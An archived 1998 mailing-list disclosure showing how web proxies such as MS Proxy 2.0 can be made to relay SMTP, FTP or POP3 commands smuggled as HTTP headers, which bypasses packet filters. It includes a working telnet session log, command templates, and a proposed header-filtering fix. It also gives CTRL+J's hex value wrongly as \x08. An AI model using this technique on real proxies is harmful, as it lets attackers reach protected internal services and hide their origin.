By-passing MS Proxy 2.0 and others packet filtering

From: Mnemonix (mnemonixat_private)
Date: Thu Oct 08 1998 - 00:27:36 PDT

  • Next message: Neil Trobaugh: "Redhat man exploit"

    Okay - to make everything more clear
    
    
    
    Firstly it seems that most web-based proxies, not just MS Proxy, are
    susceptible to this kind of attack. Thanks to Greg Jones and others for
    doing some testing on this.
    
    > Whilst playing around with Microsoft's Proxy Server 2, I came across an
    > interesting "feature" that could allow someone to by-pass packet
    filtering
    > if enabled.
    > The essence of the "exploit" is to connect to a remote host on a given
    port
    > - in the example provided I have used the SMTP port (25) - through the
    Web
    > Proxy Service.
    
    The Web-proxy is listening on TCP port 80. I telnet to port 80 and make an
    HTTP request.
    
    > What you attempt to do is disguise service-specific commands as HTTP
    > headers. Below is a log of a telnet session where I've telnetted to the
    Web
    > Proxy Service, made a GET request and passed off the SMTP commands as
    HTTP
    > headers :
    >
    >
    ------------------------------------------8<--------------------------------
    
    > ----------
    > GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
    > mail from: meat_private
    > rcpt to: mnemonixat_private
    > data :
    > Subject: This is the Subject Line
    > :
    >  This is the body of the message. To get here do a Ctrl+J. To place a
    > single dot on a line do another Ctrl+J
    >                                                           .
    >
    > 220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
    > 500 Command unrecognized
    > 500 Command unrecognized
    > 500 Command unrecognized
    > 250 <meat_private> is syntactically correct
    > 250 <mnemonixat_private> is syntactically correct
    > 354 Enter message, ending with "." on a line by itself
    > 250 OK id=0zQmVd-0007md-00
    > 500 Command unrecognized
    > 500 Command unrecognized
    >
    >
    ------------------------------------------8<--------------------------------
    
    > ---------
    
    
    What is happening here is that the proxy interprets everything with line or
    continuous string with a ":" (colon) as a header and so passes it on to the
    final destination. The proxy server also adds some of its own HTTP headers
    such as "Via: proxy_name", "Host: final_destination", "Connection:
    Keep-Alive" as well as the orignal "GET / HTTP/1.0" (This is why you get
    some "Command Unrecognised"s.
    
    For a service like FTP or POP3 you can string all the commands together
    like so:
    
    GET http://some.server:21_or_110/ HTTP/1.0
    :(CTRL+J)
            user whoever(CTRL+J)
                            pass whatever(CTRL+J)
                                    stat(CTRL+J)
                                            etc = etc and finish with ENTER.
    
    
    
    
    Note- everything is stored up and then on you pressing enter twice it is
    sent to the target in a oner - the target buffers the headers and deals
    with them sequentially. Some it understands - eg your stealthed-as-HTTP
    headers and others it doesn't eg the real HTTP proxy headers.
    
    Okay - that's the how - now what can be done with it?
    
    Depending on the configuration of the proxy server it may allow external
    attackers to come in off the internet and access services or machines
    through a packet filter that ONLY allows incoming requests on port 80. Once
    you are onto the proxy server requests are passed off the internal
    interface to machines inside your "protected" LAN - making it as though the
    packet filter was not there.
    
    In publicly acessible proxies - attacks can be launched against other
    machines across the Internet and to a certain degree hide the attacker's
    own IP address on the target machine.
    
    This method of attack can be used to by-pass IP address trust (or distrust)
    mechanisms as well as to exploit with r* unix daemons.
    
    There are many ways this can be exploited - too many to list in detail -
    (I've got to go to work now ;-) but because of this I'd suggest as a
    solution something like the following:
    
    Rather than relying on the Admin to configure the proxy properly would it
    not be safer to get the proxy to filter out unkown headers. For example
    most browsers will specify a "User-Agent:" header - the proxy should pass
    this through - but it should remove a non-standard "HTTP" header like "mail
    from: meat_private" - since when do browsers use this as an HTTP header -
    other than when used for subversive activities. There should also be a
    mechanism where it will strip out headers containing the hex value \x08
    (CTRL+J) - because you could do this :
    
    User-Agent: Mozilla/2.0(CTRL+J)
                    Command 1(CTRL+J)
                            Command 2(CTRL+J)
                                    Command 3(CTRL+J)
                                            etc etc
    
    
    > This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
    > IIS 3.0 and MS Proxy 2.0
    
    Originally - but as was stated other web-pased proxies are also
    susceptible.
    
    Cheers and l8r
    
     Mnemonix
     http://www.diligence.co.uk/
     http://www.infowar.co.uk/mnemonix
    



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